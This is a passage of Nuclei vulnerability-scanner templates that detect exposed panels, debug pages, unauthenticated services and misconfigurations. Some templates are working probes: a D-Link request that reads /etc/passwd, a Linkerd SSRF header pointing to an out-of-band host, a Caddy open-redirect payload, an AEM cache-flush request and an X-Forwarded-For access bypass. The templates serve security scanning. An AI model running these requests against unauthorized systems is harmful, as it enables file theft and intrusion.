22 | 23 | - type: status 24 | status: 25 | - 200 -------------------------------------------------------------------------------- /web/pocs/nuclei/miscellaneous/dir-listing.yaml: -------------------------------------------------------------------------------- 1 | id: dir-listing 2 | 3 | info: 4 | name: Directory listing enabled 5 | author: _harleo,pentest_swissky 6 | severity: info 7 | reference: 8 | - https://portswigger.net/kb/issues/00600100_directory-listing 9 | tags: misc,generic 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "Directory listing for" 20 | - "Index of /" 21 | - "[To Parent Directory]" 22 | - "Directory: /" 23 | condition: or -------------------------------------------------------------------------------- /web/pocs/nuclei/miscellaneous/email-extractor.yaml: -------------------------------------------------------------------------------- 1 | id: email-extractor 2 | 3 | info: 4 | name: Email Extractor 5 | author: panch0r3d 6 | severity: info 7 | tags: misc,email 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "[a-zA-Z0-9-_.]{4,}@[A-Za-z0-9_-]+[.](com|org|net|io|gov|co|co.uk|com.mx|com.br|com.sv|co.cr|com.gt|com.hn|com.ni|com.au|com.cn)" 19 | -------------------------------------------------------------------------------- /web/pocs/nuclei/miscellaneous/firebase-database-extractor.yaml: -------------------------------------------------------------------------------- 1 | id: firebase-database-extractor 2 | 3 | info: 4 | name: Firebase Database Extract Check 5 | author: rafaelwdornelas 6 | severity: info 7 | description: Extract Firebase Database 8 | tags: firebase,misc 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | extractors: 16 | - type: regex 17 | part: body 18 | regex: 19 | - "[a-z0-9.-]+\\.firebaseio\\.com" 20 | - "[a-z0-9.-]+\\.firebaseapp\\.com" 21 | -------------------------------------------------------------------------------- /web/pocs/nuclei/miscellaneous/google-floc-disabled.yaml: -------------------------------------------------------------------------------- 1 | id: google-floc-disabled 2 | 3 | info: 4 | name: Google FLoC Disabled 5 | author: geeknik 6 | severity: info 7 | description: The detected website has decided to explicitly exclude itself from Google FLoC tracking. 8 | reference: 9 | - https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/ 10 | tags: google,floc,misc 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}" 16 | 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - "interest-cohort=()" 22 | -------------------------------------------------------------------------------- /web/pocs/nuclei/miscellaneous/microsoft-azure-error.yaml: -------------------------------------------------------------------------------- 1 | id: microsoft-azure-error 2 | 3 | info: 4 | name: Microsoft Azure Web App - Error 404 5 | author: dhiyaneshDK 6 | severity: info 7 | metadata: 8 | shodan-query: title:"Microsoft Azure Web App - Error 404" 9 | tags: error,azure,microsoft 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 404 21 | 22 | - type: word 23 | words: 24 | - "Microsoft Azure Web App - Error 404" 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/miscellaneous/options-method.yaml: -------------------------------------------------------------------------------- 1 | id: options-method 2 | 3 | info: 4 | name: Allowed Options Method 5 | author: pdteam 6 | severity: info 7 | tags: misc,generic 8 | 9 | requests: 10 | - method: OPTIONS 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: header 17 | group: 1 18 | regex: 19 | - "Allow: ([A-Z, ]+)" 20 | -------------------------------------------------------------------------------- /web/pocs/nuclei/miscellaneous/robots-txt.yaml: -------------------------------------------------------------------------------- 1 | id: robots-txt 2 | 3 | info: 4 | name: robots.txt file 5 | author: CasperGN 6 | severity: info 7 | tags: misc,generic 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/robots.txt" 13 | 14 | matchers-condition: and 15 | redirects: true 16 | matchers: 17 | - type: word 18 | words: 19 | - "Disallow:" 20 | 21 | - type: word 22 | part: header 23 | words: 24 | - text/plain 25 | 26 | - type: dsl 27 | dsl: 28 | - "len(body)>=140 && status_code==200" 29 | -------------------------------------------------------------------------------- /web/pocs/nuclei/miscellaneous/xml-schema-detect.yaml: -------------------------------------------------------------------------------- 1 | id: xml-schema-detect 2 | 3 | info: 4 | name: XML Schema Detection 5 | author: alph4byt3 6 | severity: info 7 | tags: misc 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/schema" 13 | 14 | matchers-condition: and 15 | redirects: true 16 | matchers: 17 | - type: word 18 | words: 19 | - ".xsd" 20 | - "Schemas" 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/adobe/adobe-connect-version.yaml: -------------------------------------------------------------------------------- 1 | id: adobe-connect-version 2 | 3 | info: 4 | name: Adobe Connect Central Version 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: adobe 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/version.txt" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'package=' 19 | part: body 20 | 21 | - type: word 22 | words: 23 | - 'text/plain' 24 | part: header 25 | 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/aem/aem-bg-servlet.yaml: -------------------------------------------------------------------------------- 1 | id: aem-bg-servlet 2 | 3 | info: 4 | name: AEM BG-Servlets 5 | author: DhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 9 | tags: aem 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/system/bgservlets/test.css' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | 22 | - type: word 23 | words: 24 | - '
Flushing output
' -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/aem/aem-cached-pages.yaml: -------------------------------------------------------------------------------- 1 | id: aem-cached-pages 2 | 3 | info: 4 | name: Invalidate / Flush Cached Pages on AEM 5 | author: hetroublemakr 6 | severity: low 7 | reference: 8 | - https://twitter.com/AEMSecurity/status/1244965623689609217 9 | tags: aem 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/dispatcher/invalidate.cache" 15 | headers: 16 | CQ-Handle: /content 17 | CQ-Path: /content 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | words: 22 | - "

OK

" 23 | part: body 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml: -------------------------------------------------------------------------------- 1 | id: aem-querybuilder-feed-servlet 2 | 3 | info: 4 | name: AEM QueryBuilder Feed Servlet 5 | author: DhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html 9 | tags: aem 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/bin/querybuilder.feed' 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | 21 | - type: word 22 | words: 23 | - 'CQ Feed' -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/airflow/airflow-debug.yaml: -------------------------------------------------------------------------------- 1 | id: airflow-debug 2 | 3 | info: 4 | name: Airflow Debug Trace 5 | author: pdteam 6 | severity: low 7 | metadata: 8 | verified: true 9 | shodan-query: title:"Airflow - DAGs" 10 | tags: apache,airflow,fpd 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/admin/airflow/login" 16 | 17 | matchers-condition: and 18 | matchers: 19 | 20 | - type: word 21 | part: body 22 | words: 23 | - "

Ooops.

" 24 | - "Traceback (most recent call last)" 25 | condition: and 26 | 27 | - type: status 28 | status: 29 | - 500 -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/alibaba-mongoshake-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: alibaba-mongoshake-unauth 2 | 3 | info: 4 | name: Alibaba Mongoshake Unauth 5 | author: pikpikcu 6 | severity: info 7 | tags: mongoshake,unauth,alibaba 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - '{"Uri":"/worker","Method":"GET"}' 20 | - type: word 21 | words: 22 | - 'text/plain' 23 | part: header 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/android-debug-database-exposed.yaml: -------------------------------------------------------------------------------- 1 | id: android-debug-database-exposed 2 | 3 | info: 4 | name: Android Debug Manager 5 | author: dhiyaneshDK 6 | severity: low 7 | reference: 8 | - https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22 9 | tags: unauth,android 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'Android Debug Database' 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/apache/apache-hbase-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: apache-hbase-unauth 2 | 3 | info: 4 | name: Apache Hbase Unauth 5 | author: pikpikcu 6 | severity: medium 7 | tags: apache,unauth,misconfig 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/conf' 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - 'hbase.defaults.for.version' 20 | - 'hbase-default.xml' 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/apc-info.yaml: -------------------------------------------------------------------------------- 1 | id: apcu-service 2 | 3 | info: 4 | name: APCu service information leakage 5 | author: koti2 6 | severity: low 7 | tags: config,service,apcu 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/apc/apc.php" 13 | - "{{BaseURL}}/apc.php" 14 | 15 | stop-at-first-match: true 16 | matchers: 17 | - type: word 18 | words: 19 | - "APCu Version Information" 20 | - "General Cache Information" 21 | - "Detailed Memory Usage and Fragmentation" 22 | condition: or 23 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/aws-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: aws-redirect 2 | 3 | info: 4 | name: Subdomain takeover AWS S3 5 | author: manikanta a.k.a @secureitmania 6 | severity: info 7 | reference: 8 | - https://link.medium.com/fgXKJHR9P7 9 | tags: aws,takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | redirects: false 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 307 22 | - type: word 23 | words: 24 | - 'Location: https://aws.amazon.com/s3/' 25 | part: header 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/caddy-open-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: caddy-open-redirect 2 | 3 | info: 4 | name: Caddy 2.4.6 Open Redirect (php_fastcgi) 5 | author: dhiyaneshDK 6 | severity: medium 7 | reference: 8 | - https://github.com/caddyserver/caddy/issues/4502 9 | tags: redirect,caddy,server 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}//example.com/%2F..' 15 | 16 | matchers: 17 | - type: regex 18 | part: header 19 | regex: 20 | - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/cgi-test-page.yaml: -------------------------------------------------------------------------------- 1 | id: cgi-test-page 2 | 3 | info: 4 | name: CGI Test page 5 | author: YASH ANAND @yashanand155 6 | severity: info 7 | tags: cgi 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/cgi-bin/test/test.cgi" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - HTTP_ACCEPT 19 | - HTTP_ACCEPT_ENCODING 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/cx-cloud-upload-detect.yaml: -------------------------------------------------------------------------------- 1 | id: cx-cloud-upload-detect 2 | 3 | info: 4 | name: CX Cloud Unauthenticated Upload Detect 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: upload 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/upload.jsp' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Display file upload form to the user" 17 | condition: and 18 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/d-link-arbitary-fileread.yaml: -------------------------------------------------------------------------------- 1 | id: dlink-file-read 2 | 3 | info: 4 | name: D-Link - Arbitrary File Retrieval 5 | author: dhiyaneshDK 6 | severity: high 7 | reference: 8 | - https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html 9 | tags: dlink,lfi 10 | 11 | requests: 12 | - method: POST 13 | path: 14 | - "{{BaseURL}}/cgi-bin/webproc" 15 | body: 'errorpage=/etc/passwd&obj-action=auth&:action=login' 16 | 17 | matchers-condition: and 18 | matchers: 19 | 20 | - type: regex 21 | regex: 22 | - "root:.*:0:0:" 23 | part: body 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/database-error.yaml: -------------------------------------------------------------------------------- 1 | id: database-error 2 | 3 | info: 4 | name: Database Error 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://www.shodan.io/search?query=http.title%3A%22Database+Error%22 9 | tags: misconfig,database 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'Database Error' 21 | 22 | - type: status 23 | status: 24 | - 500 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/django-debug-detect.yaml: -------------------------------------------------------------------------------- 1 | id: django-debug 2 | 3 | info: 4 | name: Django Debug Method Enabled 5 | author: dhiyaneshDK,hackergautam 6 | severity: medium 7 | tags: django,debug 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/NON_EXISTING_PATH/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - URLconf defined 19 | - Page not found 20 | - Django tried these URL patterns, in this order 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 404 -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/docker-registry.yaml: -------------------------------------------------------------------------------- 1 | id: docker-registry 2 | 3 | info: 4 | name: Docker Registry Listing 5 | author: puzzlepeaches 6 | severity: medium 7 | tags: docker,devops 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/v2/_catalog" 13 | redirects: true 14 | max-redirects: 1 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - '"repositories":' 20 | - type: word 21 | words: 22 | - "application/json" 23 | part: header 24 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/druid-monitor.yaml: -------------------------------------------------------------------------------- 1 | id: druid-monitor 2 | 3 | info: 4 | name: Druid Monitor Unauthorized Access 5 | author: ohlinge 6 | severity: high 7 | tags: druid,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/druid/index.html" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Druid Stat Index' 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/exposed-jquery-file-upload.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-jquery-file-upload 2 | 3 | info: 4 | name: Exposed jQuery File Upload 5 | author: dhiyaneshDk 6 | severity: medium 7 | reference: 8 | - https://www.exploit-db.com/exploits/45584 9 | tags: exposure,jquery 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/jquery-file-upload/server/php/" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | regex: 20 | - '^{\"files\":' 21 | part: body 22 | - type: word 23 | words: 24 | - "text/plain" 25 | part: header 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/exposed-kafdrop.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-kafdrop 2 | 3 | info: 4 | name: Publicly exposed Kafdrop Interface 5 | author: dhiyaneshDk 6 | severity: low 7 | tags: exposure,misconfig,kafdrop 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Kafdrop: Broker List" 18 | - "Kafka Cluster Overview" 19 | condition: and 20 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/exposed-kibana.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-kibana 2 | 3 | info: 4 | name: Exposed Kibana 5 | author: Shine 6 | severity: medium 7 | tags: kibana,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | - '{{BaseURL}}/app/kibana/' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'kibanaWelcomeView' 20 | - 'cluster_uuid' 21 | - 'kibanaWelcomeLogo' 22 | - 'kibanaWelcomeTitle' 23 | - type: status 24 | status: 25 | - 200 -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/exposed-sqlite-manager.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-sqlite-manager 2 | 3 | info: 4 | name: SQLiteManager 5 | author: dhiyaneshDK 6 | severity: medium 7 | reference: 8 | - https://www.exploit-db.com/ghdb/5003 9 | tags: sqlite 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/sqlite/' 15 | - '{{BaseURL}}/sqlitemanager/' 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - 'SQLiteManager' 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/formalms-install.yaml: -------------------------------------------------------------------------------- 1 | id: formalms-install 2 | 3 | info: 4 | name: Formalms Exposed Installation 5 | author: princechaddha 6 | severity: high 7 | tags: misconfig,formalms 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/install/' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - 'forma.lms installer' 20 | - '

forma.lms - Installation

' 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/git-web-interface.yaml: -------------------------------------------------------------------------------- 1 | id: git-web-interface 2 | 3 | info: 4 | name: Git web interface 5 | author: dhiyaneshDK 6 | severity: low 7 | metadata: 8 | shodan-query: html:"git web interface version" 9 | tags: git 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'git web interface version' 21 | 22 | - type: status 23 | status: 24 | - 200 -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/gitlist-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: gitlist-disclosure 2 | 3 | info: 4 | name: GitList Disclosure 5 | author: dhiyaneshDK 6 | severity: low 7 | metadata: 8 | shodan-query: title:"GitList" 9 | tags: gitlist,misconfig 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'GitList' 21 | 22 | - type: status 23 | status: 24 | - 200 -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/hadoop-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: hadoop-unauth 2 | 3 | info: 4 | name: Apache Hadoop Unauth 5 | author: pdteam 6 | severity: low 7 | tags: apache,hadoop,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/ws/v1/cluster/info' 13 | - '{{BaseURL}}/ws/v1/cluster/apps/new-application' 14 | 15 | matchers-condition: or 16 | matchers: 17 | - type: word 18 | words: 19 | - 'hadoopVersion' 20 | - 'resourceManagerVersionBuiltOn' 21 | condition: and 22 | 23 | - type: word 24 | words: 25 | - 'javax.ws.rs.WebApplicationException' 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/haproxy-status.yaml: -------------------------------------------------------------------------------- 1 | id: haproxy-status 2 | 3 | info: 4 | name: HA Proxy Statistics 5 | author: dhiyaneshDK 6 | severity: medium 7 | reference: 8 | - https://www.exploit-db.com/ghdb/4191 9 | tags: logs,haproxy 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/haproxy-status" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'Statistics Report for HAProxy' 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/hp/unauthorized-hp-officepro-printer.yaml: -------------------------------------------------------------------------------- 1 | id: unauthorized-hp-officepro-printer 2 | 3 | info: 4 | name: Unauthorized HP office pro printer 5 | author: pussycat0x 6 | severity: high 7 | metadata: 8 | shodan-dork: http.title:"Hp Officejet pro" 9 | tags: hp,iot,unauth 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | regex: 20 | - 'HP Officejet Pro([ 0-9A-Za-z]+)<\/title>' 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/hpe-system-management-anonymous.yaml: -------------------------------------------------------------------------------- 1 | id: hpe-system-management-anonymous-access 2 | 3 | info: 4 | name: HPE System Management Anonymous Access 5 | author: divya_mudgal 6 | severity: low 7 | tags: hp,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/chpstrt.php?chppath=Home" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | condition: and 18 | words: 19 | - "username = \"hpsmh_anonymous\";" 20 | - "var host_addr = '" 21 | - "var ip_addr = '" -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/jaeger-ui-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: jaeger-ui-dashboard 2 | 3 | info: 4 | name: Jaeger UI 5 | author: dhiyaneshDK 6 | severity: low 7 | metadata: 8 | shodan-query: http.title:"Jaeger UI" 9 | tags: misconfig 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/search" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - '<title>Jaeger UI' 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/jboss-status.yaml: -------------------------------------------------------------------------------- 1 | id: jboss-web-console 2 | 3 | info: 4 | name: JBoss Management Console Server Information 5 | author: dhiyaneshDK 6 | severity: low 7 | reference: 8 | - https://www.exploit-db.com/ghdb/5215 9 | tags: jboss,unauth 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/web-console/ServerInfo.jsp" 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Application Server" 20 | - "Management Console" 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/jetty-showcontexts-enable.yaml: -------------------------------------------------------------------------------- 1 | id: jetty-showcontexts-enable 2 | 3 | info: 4 | name: Jetty showContexts Enable in DefaultHandler 5 | author: dhiyaneshDK 6 | severity: low 7 | reference: 8 | - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jetty-showcontexts-enable.yaml 9 | tags: jetty 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Contexts known to this server are:" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/jkstatus-manager.yaml: -------------------------------------------------------------------------------- 1 | id: jkstatus-manager 2 | 3 | info: 4 | name: JK Status Manager 5 | author: pdteam 6 | severity: low 7 | tags: config,status 8 | 9 | requests: 10 | - method: GET 11 | headers: 12 | X-Forwarded-For: "127.0.0.1" 13 | path: 14 | - "{{BaseURL}}/jkstatus/" 15 | matchers: 16 | - type: word 17 | words: 18 | - "JK Status Manager" 19 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/jupyter-ipython-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: jupyter-ipython-unauth 2 | 3 | info: 4 | name: Jupyter ipython Unauth 5 | author: pentest_swissky 6 | severity: critical 7 | description: Unauthenticated access to Jupyter instance 8 | tags: unauth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/ipython/tree" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - ipython/static/components 23 | - ipython/kernelspecs 24 | part: body -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/kafka-cruise-control.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-cruise-control 2 | 3 | info: 4 | name: Kafka Cruise Control UI 5 | author: dhiyaneshDK 6 | severity: medium 7 | metadata: 8 | shodan-query: http.title:"Kafka Cruise Control UI" 9 | tags: kafka,misconfig 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | redirects: true 17 | max-redirects: 2 18 | matchers: 19 | - type: word 20 | words: 21 | - 'Kafka Cruise Control UI' 22 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/kubernetes/kubernetes-resource-report.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-resource-report 2 | 3 | info: 4 | name: Detect Overview Kubernetes Resource Report 5 | author: pussycat0x 6 | severity: medium 7 | description: Information Disclosure of Kubernetes Resource Report 8 | tags: kubernetes,exposure 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: body 19 | words: 20 | - "Overview - Kubernetes Resource Report" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/laravel-debug-enabled.yaml: -------------------------------------------------------------------------------- 1 | id: laravel-debug-enabled 2 | 3 | info: 4 | name: Laravel Debug Enabled 5 | author: notsoevilweasel 6 | severity: medium 7 | description: Laravel with APP_DEBUG set to true is prone to show verbose errors. 8 | tags: debug,laravel,misconfig 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/_ignition/health-check" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - can_execute_commands 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/laravel-debug-error.yaml: -------------------------------------------------------------------------------- 1 | id: laravel-debug-error 2 | 3 | info: 4 | name: Larvel Debug Method Enabled 5 | author: dhiyaneshDK 6 | severity: medium 7 | tags: debug,laravel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Whoops! There was an error 19 | 20 | - type: status 21 | status: 22 | - 500 -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/linkerd-ssrf-detect.yaml: -------------------------------------------------------------------------------- 1 | id: linkerd-ssrf-detection 2 | 3 | info: 4 | name: Linkerd SSRF detection 5 | author: dudez 6 | severity: high 7 | reference: 8 | - https://twitter.com/nirvana_msu/status/1084144955034165248 9 | tags: ssrf,linkerd,oast 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | headers: 16 | l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443 17 | 18 | matchers: 19 | - type: word 20 | part: interactsh_protocol # Confirms the HTTP Interaction 21 | words: 22 | - "http" -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/manage-engine-ad-search.yaml: -------------------------------------------------------------------------------- 1 | id: manage-engine-ad-search 2 | 3 | info: 4 | name: Manage Engine AD Search 5 | author: PR3R00T 6 | severity: high 7 | description: Manage Engine AD Manager service can be configured to allow anonymous users to browse the AD list remotely. 8 | tags: unauth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/ADSearch.cc?methodToCall=search" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "ManageEngine" 23 | - "ADManager" 24 | condition: and -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/misconfigured-concrete5.yaml: -------------------------------------------------------------------------------- 1 | id: misconfigured-concrete5 2 | 3 | info: 4 | name: Misconfigured Concrete5 5 | author: pdteam 6 | severity: low 7 | tags: misconfig,concrete,cms 8 | 9 | requests: 10 | - method: GET 11 | path: 12 